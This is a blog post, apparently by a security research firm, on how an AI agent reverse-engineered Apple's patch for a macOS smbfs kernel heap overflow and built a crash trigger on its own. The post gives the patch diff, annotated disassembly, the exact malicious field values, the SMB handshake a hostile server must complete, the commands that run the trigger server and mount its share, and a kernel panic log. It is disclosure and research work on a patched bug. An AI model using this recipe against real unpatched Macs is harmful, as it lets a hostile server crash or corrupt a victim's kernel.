MAD Bugs: An Apple Kernel Bug, Brought to You by Microsoft

Autonomous N-day analysis of CVE-2026-28825.

Apr 22, 2026

This post is part of MAD Bugs, our Month of AI-Discovered Bugs, where we pair frontier models with human expertise and publish whatever falls out.

At Calif we spend an unhealthy amount of time picking apart Apple security updates and beta releases. Today we want to highlight CVE-2026-28825, a kernel heap out-of-bounds write in smbfs.kext that Apple patched in macOS 26.4, and share how we used Claude to analyze and reproduce it.

Throughout this analysis you will notice that the data comes from ipsw, IDA, MS-SMB2, and XNU, which is nothing unusual; people have been bindiffing Apple updates since roughly the invention of the apple. The interesting part is that the agent did this autonomously using our in-house harness, driving the same tools a human researcher would, with no human intervention between "here's a URL" and "here's a kernel panic."

What follows is a human-annotated version of what the AI did. Our commentary is in italics, mostly so you can tell which parts are us being smug and which parts are the robot being smart.

The setup

So far in this MAD Bugs series we've mostly asked models to find new bugs. This time we wanted to flip it around: given nothing but a vendor advisory, can an agent reconstruct the bug and produce a working trigger? Can AI do the N-day grind so we don't have to?

We gave Claude a host running macOS 26.4, a 26.3.2 VM to bully, our Calif harness (which is first-rate duct tape around ipsw, tart, and headless IDA), and one prompt:

we are going to try and triage and write n-day PoC exploits for the latest macOS 26.4 (which is the same as the host you are running on) here is the apple security notes - https://support.apple.com/en-us/126794 create a plan/TODO list with an item for EACH of these so we can research them one-by-one and create a list of the MOST interesting/highest impact ones to look into and then we will do deep dives on each and create exploit PoCs for each do you understand? ask any clarifying questions now

That's it. We then went to the gym and absolutely did not spend the entire time refreshing the Claude session log on our phones.

The vulnerability

The macOS 26.4 security notes list a few dozen CVEs across the usual lineup: WebKit, Kernel, AppleMobileFileIntegrity, CoreAudio, the gang's all here.

Claude dutifully built a TODO for each one, ranked them, and reproduced two of the SMB entries. The trigger for what we believe is CVE-2026-28835 turned out to be flaky, so this post focuses on the other one, which we believe is CVE-2026-28825:

Available for: macOS Tahoe
Impact: An app may be able to modify protected parts of the file system
Description: An out-of-bounds write issue was addressed with improved bounds checking.
CVE-2026-28825: Sreejith Krishnan R

A caveat on those CVE numbers: the advisory has several SMB entries with near-identical wording, and Apple does not tell you which line maps to which function, so our mapping from "this cmp/b.hi in smb2_rq_decompress_read" to "CVE-2026-28825" is best-effort. The vulnerability is real and verified against a 26.3.2 kernel.

In hindsight it's a sensible pick. "Out-of-bounds write … improved bounds checking" usually means a single inserted compare-and-branch, which is about the cleanest bindiff signal you can hope for; smbfs ships in the boot kernelcache, so both versions can be carved out with ipsw and diffed as a single binary rather than chased across two dyld shared caches; and SMB is a network filesystem, so whatever "an app" is doing to trigger this, a server on the other end of a socket can probably do too. The agent's initial assessment was that the PoC would amount to "a Python server," which turned out to be doing a tremendous amount of work, but we'll get there.

The patch

Claude pulled both kernelcaches and carved out the smbfs kext. If you want to follow along at home, ipsw will fetch just the kernelcache out of Apple's CDN without making you download the full multi-GB restore image:

# 26.3.2 is no longer signed, so use the appledb index rather than ipsw.me
ipsw download appledb --os macOS --device VirtualMac2,1 --build 25D2140 --kernel -y -o old
ipsw download appledb --os macOS --device VirtualMac2,1 --build 25E246  --kernel -y -o new

# carve smbfs out of each kernelcache
ipsw kernel extract old/25D2140__VirtualMac2,1/kernelcache.release.VirtualMac2,1 \
    com.apple.filesystems.smbfs -o old
ipsw kernel extract new/25E246__VirtualMac2,1/kernelcache.release.VirtualMac2,1 \
    com.apple.filesystems.smbfs -o new

Then, rather than diffing every function like some kind of animal, it did what every reverser does first and diffed the strings. ipsw macho info --strings prefixes each line with its load address, which moves between builds, so strip that and sort before comparing:

diff <(ipsw macho info old/com.apple.filesystems.smbfs --strings --no-color | sed 's/^0x[0-9a-f]*: //' | sort) \
     <(ipsw macho info new/com.apple.filesystems.smbfs --strings --no-color | sed 's/^0x[0-9a-f]*: //' | sort)

And Apple, bless them, had left a little present:

296a297
> "%s: compress_len %u > originalCompressedSegmentSize %u \n"
546a548
> "%s: Freeing con with unexpected state of 0x%x?"

A brand-new error string of the form "X > Y" appearing in a security update is the bindiff equivalent of a neon sign that says BUG WAS HERE. The string's only xref is inside smb2_rq_decompress_read, the function had grown by exactly 60 bytes between versions, and the entire delta was this:

; macOS 26.4, smb2_rq_decompress_read +0x6d4
loc_fffffe0009b7cb9c:
    cmp   w9, w8                ; w9 = compress_len, w8 = OriginalCompressedSegmentSize
    b.hi  loc_fffffe0009b7cdec  ; → log the new string, return EBADRPC
    mov   w2, w9
    ...
    bl    _md_get_mem

So the fix is "before copying compress_len bytes into a buffer, check that compress_len fits in the buffer," and you can probably guess what the bug is.

The root cause

This is where it usually gets slow for humans, because smb2_rq_decompress_read is ~800 instructions of nested header parsing for the SMB 3.1.1 compression transform. SMB 3.1.1 actually defines two flavours of that transform: unchained (MS-SMB2 §2.2.42.1), which is one header followed by one compressed blob, and chained (§2.2.42.2), which is one outer header followed by a list of payload chunks, each carrying its own algorithm and length so different slices of the same message can be compressed differently. Apple's parser handles both in one function, splitting on a session flag, and the bug lives in the chained branch.

The agent had to work out which branch was which from the disassembly alone, which meant matching the field layouts each arm parses against §2.2.42.1 vs §2.2.42.2 until one of them lined up. This is precisely what a human would do, minus the part where the human opens fourteen browser tabs of Microsoft Learn and emerges three hours later unsure whether the Strait of Humorz remains closed.

The agent's full disasm walkthrough is in agent/ANALYSIS.md; here's the fun part. When the smbfs client receives a frame starting with \xfcSMB, it parses the outer transform header and allocates a scratch buffer:

; OriginalCompressedSegmentSize from the wire → [sp+0x4c], capped only at 8 MiB
:206  lsl   w19, w8, #0x1        ; w19 = OCSS * 2
:209  bl    <kalloc_data>        ; alloc(2 * OCSS)   ← attacker picks the zone, how thoughtful
:211  mov   x20, x0
:218  add   x23, x20, x8         ; output half = x20 + OCSS

The buffer is 2 × OriginalCompressedSegmentSize: front half for compressed input, back half for decompressed output. OriginalCompressedSegmentSize comes straight off the wire with only an 8 MiB cap, which means the attacker gets to pick which kalloc zone this lands in.

Then it loops over chained payload chunks, and each chunk header has two attacker-controlled sizes: OriginalPayloadSize (how big this chunk will be after decompression) and Length (how many compressed bytes are on the wire right now). Watch carefully:

:567  bl    _md_get_uint32le      ; OriginalPayloadSize → [sp+0x3c]
:585  ldr   w8, [sp, #0x3c]       ; OriginalPayloadSize
:587  sub   w9, w9, w24           ; remaining output budget
:588  cmp   w8, w9
:589  b.hi  error                 ; ✓ decompressed size fits in output half? great!

:590  ldr   w9, [sp, #0x44]       ; Length
:591  subs  w8, w9, #0x4          ; compress_len = Length - 4
:610  mov   w2, w8                ; size = compress_len   ← wait, nobody checked this one
:612  mov   x1, x20               ; dst  = the OCSS-byte input half
:614  bl    _md_get_mem           ; memcpy(heap, wire, compress_len)  ← oh no

It carefully validates that the decompressed size will fit in the output half, then copies the compressed bytes into the input half without checking them at all. The only constraint on Length is "are there that many bytes left in the mbuf chain?", and since we're the server, there are exactly as many bytes as we feel like sending.

So the recipe writes itself: send OriginalCompressedSegmentSize = 0x100 to get a cute little kalloc(0x200) buffer, send OriginalPayloadSize = 0x80 to pat the bouncer on the head, then send Length = 0x10000 followed by 64 KiB of 0x41. The md_get_mem happily writes 0xFFFC bytes into a 512-byte allocation and keeps on trucking through whatever's next door.

The catch (that wasn't)

While tracing the dispatch path in smb_iod_recvall, Claude found a gate in front of the vulnerable function:

ldr  w8, [session+0x620]   ; negotiated compression algorithm bitmap
cbz  w8, normal_parse      ; if 0, never reach smb2_rq_decompress_read

It then went looking for what controls that field, found the comp_algorithms_map option in nsmb.conf (default 0), and concluded the bug was only reachable if the victim had gone out of their way to enable SMB compression. That assessment is baked into agent/ANALYSIS.md, agent/README.md, and the warning server.py prints when the client doesn't offer a compression context. On that basis the agent wrote this up as a lab curiosity rather than something you'd worry about in the wild.

Hold that thought.

The PoC

The actual overflow payload, build_overflow_payload(), is about 25 lines. The other ~750 lines of server.py are the agent slowly discovering that mount_smbfs is an extremely picky conversational partner. Here is what macOS demands before it will deign to issue a READ:

Multi-protocol negotiate: an SMB1 0xFF SMB hello answered with an SMB2 wildcard, like it's 2006.
NEGOTIATE: dialect 0x0311, a preauth integrity context, and the compression context with COMPR_FLAG_CHAINED + LZ77_HUFFMAN that makes any of this reachable in the first place.
SESSION_SETUP ×2: raw NTLMSSP Type-1/2/3, not SPNEGO-wrapped, because macOS 26 decided SPNEGO is for other people.
TREE_CONNECT: ShareType=DISK, full access, no questions asked.
Compounded CREATE/QUERY_INFO/CLOSE: mount-time probes chained via NextCommand, because one request at a time is for cowards.
IOCTL FSCTL_VALIDATE_NEGOTIATE_INFO: echo the negotiate parameters back so the client doesn't accuse us of MITM'ing ourselves.
QUERY_DIRECTORY info_class=0x25: a FileIdBothDirectoryInformation entry saying yes, there's totally a 1 MiB file here.
READ: finally, finally, build_overflow_payload().

This stage is where most of the wall-clock time went, though "most" is relative: the whole thing from advisory to confirmed panic was a few hours. You can reconstruct the wall-hitting from the artifacts: the client hangs up at SESSION_SETUP because macOS sends raw NTLMSSP rather than SPNEGO, then the compounded NextCommand mount-time probes need handling, then QUERY_DIRECTORY turns out to want info class 0x25 (FileIdBothDirectoryInformation), and so on. The troubleshooting section of the agent's README and the test log at the bottom of it are basically the therapy journal.

# attacker
sudo python3 server.py --host 0.0.0.0

# victim VM
mkdir -p /tmp/m
mount_smbfs -N //guest@<attacker-ip>/poc /tmp/m

The panic

In our testing the target panics immediately on mount; you don't even get your shell prompt back before the VM stops being a VM and starts being a very expensive paperweight.

panic(cpu 0 caller 0xfffffe0041ad1bb8): Kernel data abort. at pc 0xfffffe0041ad858c, lr 0x19c2fe0044ad2340 (saved state: 0xfffffeab785478a0)
      x0:  0xfffffe32db26bc64 x1:  0xfffffe393878c438  x2:  0x0000000000003b74  x3:  0xfffffe32db26c000
      x4:  0x0000000000000000 x5:  0x000000000000001c  x6:  0x0000000000000041  x7:  0x0000310353f6f896
      x8:  0x4141414141414141 x9:  0x4141414141414141  x10: 0x4141414141414141  x11: 0x4141414141414141
      x12: 0x4141414141414141 x13: 0x4141414141414141  x14: 0x4141414141414141  x15: 0x4141414141414141
      x16: 0x0000000000003fb0 x17: 0x8b6bfe0045015c00  x18: 0x0000000000000000  x19: 0x000000000000fffc
      x20: 0xfffffeab78547cf0 x21: 0x0000000000000000  x22: 0xfffffe1bad1de000  x23: 0xfffffe32db26bc64
      x24: 0x0000000000003f50 x25: 0xfffffe393878c07c  x26: 0x000000000000ff98  x27: 0xfffffe00453753a0
      x28: 0xfffffe1ba74efac8 fp:  0xfffffeab78547bf0  lr:  0x19c2fe0044ad2340  sp:  0xfffffeab78547bf0
      pc:  0xfffffe0041ad858c cpsr: 0x20401208         esr: 0x0000000096000047  far: 0xfffffe32db26c000

Probabilistic GZAlloc Report:
  Zone    : data_shared.kalloc.512
  Address : 0xfffffe32db26c000
  Element : [0xfffffe32db26be00, 0xfffffe32db26c000) of size 512
  Kind    : out-of-bounds (high confidence)
  Access  : 1 byte(s) past

That's eight general-purpose registers screaming AAAAAAAA in unison, x19 still holding our 0xfffc copy length, x6 holding the spray byte, and PGZ politely noting an out-of-bounds write past a 512-byte element in data_shared.kalloc.512, which is exactly where kalloc_data(2 × 0x100) lands.

The human expertise

This is where the autonomous run ended and we picked it up. The agent had handed us a working PoC with one asterisk attached: "non-default config required, victim must set comp_algorithms_map in nsmb.conf." We wanted to know how critical that asterisk really was, so we did the laziest possible experiment: deleted the nsmb.conf provisioning from the trigger script, pointed it at a fresh, never-configured 26.3.2 VM, and ran it.

It panicked anyway. 100% of the time.

So much for the asterisk. Conveniently, Apple publishes the SMB client source at apple-oss-distributions/SMBClient, so we don't even have to argue from disassembly.

To be clear, "we" here still means Claude. Our contribution to this section was deleting three lines from a shell script and typing "huh, why did that work?" into a chat box. The manual source-code audit that follows, like every other piece of manual labor in this post, is the model's work; we don't read C by hand anymore, we are not farmers.

There are two places smbfs touches compression at negotiate time, and they are not symmetric:

smb2_smb_add_negotiate_contexts builds the client's outgoing NEGOTIATE request. This is where comp_algorithms_map matters: with the default of 0, the client doesn't include an SMB2_COMPRESSION_CAPABILITIES context in what it sends. The agent traced this side, saw the config gate, and stopped.
smb2_smb_parse_negotiate_contexts parses the server's NEGOTIATE response, and it has no such gate. From smb_smb_2.c:

/* Get CompressionAlgorithms */
for (i = 0; i < compression_algorithm_cnt; i++) {
    error = md_get_uint16le(&md_context_shadow, &compression_algorithm);
    ...
    switch(compression_algorithm) {
        case SMB2_COMPRESSION_LZ77_HUFFMAN:
            sessionp->server_compression_algorithms_map |= SMB2_COMPRESSION_LZ77_HUFFMAN_ENABLED;
            break;
        case SMB2_COMPRESSION_LZ77:
            sessionp->server_compression_algorithms_map |= SMB2_COMPRESSION_LZ77_ENABLED;
            break;
        ...
    }
}

There is no intersection check against the client's own algorithm map. The client never asked for compression, the server says "we'll be using LZ77+Huffman, thanks," and the client just writes it down. (The encryption and signing arms of the same switch do validate the server's choice; compression alone does not. There is even a stale comment a few lines up reading "We do not support compression, so can ignore this reply," presumably left over from before compression support was bolted on.) From that point on server_compression_algorithms_map, which is the field at [session+0x620], is non-zero, the dispatch gate in smb_iod_recvall is satisfied, and every \xfcSMB frame goes straight to smb2_rq_decompress_read.

The Microsoft connection

While we had the source open we also found out why the bug exists in the first place, and it's too good not to share. Right above the missing check, in smb_crypt.c:

#if 0
    /*
     * Oddly, Windows server will send a compress length that
     * is bigger than the decompressed length which will cause
     * this check to fail. Why they dont just send the non
     * compressed data?
     *
     * Sanity check the compress length
     */
    if (compress_len > (originalCompressedSegmentSize - CurrentDecompressedDataSize)) {
        SMBERROR("Algorithm %d compress_len %d > remaining to decompress len %d? \n", ...);
        error = EINVAL;
        goto bad;
    }
#endif

The bounds check was there. Someone #if 0'd it out because Windows Server tripped it, left a slightly exasperated comment, and shipped. The 26.4 fix doesn't re-enable this block; it adds a looser check further down that's tight enough to stop the overflow but slack enough to keep Windows happy. (If you want to diff it yourself: vulnerable through tag SMBClient-532.80.3, fixed in SMBClient-538.100.12.)

We asked Claude whether it laughed when it found that comment. It claimed it "doesn't experience humor the way humans do" and then blamed Microsoft for the bug, which as Apple fanbois we found to be very relatable.

Conclusion

To be clear about scope: we didn't ask Claude to find this bug, and it didn't. Credit for the discovery goes to Sreejith Krishnan R. What we asked Claude to do was the N-day grind: take a one-line advisory and a pair of kernelcaches, reverse-engineer the fix, work out the root cause, and build something that triggers it. That part ran end to end without a human opening IDA, and the gap between "Apple ships a patch" and "someone has a working trigger" just got a lot shorter.

The reachability miss is, if anything, the more interesting result. The agent assessed this as "gated behind a config nobody sets"; in reality it's "mount any share the attacker controls," which on macOS is a single click on an smb:// link in Finder, Safari, or Messages. That's a meaningful swing in severity, and it tells you something about where the model is today: the taint tracking, the protocol scaffolding, the eight-stage SMB state machine were flawless, and the one thing it got wrong was a judgment call about which of two sibling functions controls a gate, where it stopped one xref short of the answer. That's exactly the kind of gap a human reviewer closes in ten minutes once the machine has done the other ninety-five percent, which is more or less the thesis of this whole series.

Everything the agent produced lives unedited under agent/ in the repo: README.md, ANALYSIS.md, REPORT.md, plus server.py at the top level. You'll see the "non-default comp_algorithms_map required" claim stated as fact throughout, because that's what the agent believed when it wrote them. We've left it that way on purpose; the unedited record of where it was right and where it was wrong is more useful than a cleaned-up one. The panic logs are in panics/.

your_friend

Apr 23

Very cool! And a very reasonable place for LLM to be able to find a bug, I must say.

Two questions, if I may:

1) Have you tried feeding it two patches without patch log and if you did what were the results?

2) What's your usual churn on these tasks? Like do you have ~ 100/1 ratio of unsuccessful passes to successful or 1/1?

Calif

Discussion about this post

Ready for more?